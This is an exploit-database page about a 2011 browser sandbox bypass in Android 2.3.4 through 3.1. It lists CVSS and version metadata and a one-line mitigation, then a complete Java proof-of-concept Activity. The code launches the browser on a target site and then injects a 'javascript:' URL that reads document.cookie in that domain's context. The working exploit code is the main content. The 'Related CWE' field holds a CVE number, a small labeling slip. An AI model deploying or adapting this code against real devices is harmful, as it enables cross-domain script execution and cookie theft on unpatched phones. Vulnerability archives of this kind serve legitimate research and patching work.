header-logo
Suggest Exploit
vendor:
Android
by:
Unknown
7.5
CVSS
HIGH
Bypass of Browser Sandbox
94
CWE
Product Name: Android
Affected Version From: Android 2.3.4
Affected Version To: Android 3.1
Patch Exists: YES
Related CWE: CVE-2011-1823
CPE: o:google:android:2.3.4 cpe:/o:google:android:3.1
Other Scripts:
Platforms Tested: Android
2011

Bypass of Browser Sandbox in Open Handset Alliance Android

The Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox. Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Mitigation:

Apply the latest security patches and updates from the Android vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. 

public class CasExploit extends Activity
{
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";;
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000;

   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      startBrowserActivity(mUrl);
         try {
             Thread.sleep(mSleep);
         }
         catch (InterruptedException e) {}
         startBrowserActivity("javascript:" + mJavascript);
   }

   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
}